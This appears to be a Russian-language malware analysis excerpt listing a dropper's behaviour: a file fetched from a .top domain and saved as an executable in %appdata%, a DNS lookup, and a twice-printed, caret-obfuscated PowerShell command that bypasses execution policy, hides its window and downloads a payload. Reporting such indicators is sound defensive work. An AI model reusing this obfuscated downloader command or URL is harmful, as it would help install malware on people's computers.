Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POw^ErSHELL.exe ^-^E^xE^cUtI^ONpoL^iCy^ BYp^A^SS^ -n^OPrOfILe ^-wiNDoWstYLe^ ^H^IdDE^n ^(NeW^-^o^BjEC^t ^SY^ste^m.n^e^t^.^wEbcliENT).dO^Wnl^oAd^Fi^LE('http://toagoores.top/read...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "POw^ErSHELL.exe ^-^E^xE^cUtI^ONpoL^iCy^ BYp^A^SS^ -n^OPrOfILe ^-wiNDoWstYLe^ ^H^IdDE^n ^(NeW^-^o^BjEC^t ^SY^ste^m.n^e^t^.^wEbcliENT).dO^Wnl^oAd^Fi^LE('http://toagoores.top/read...' (со скрытым окном)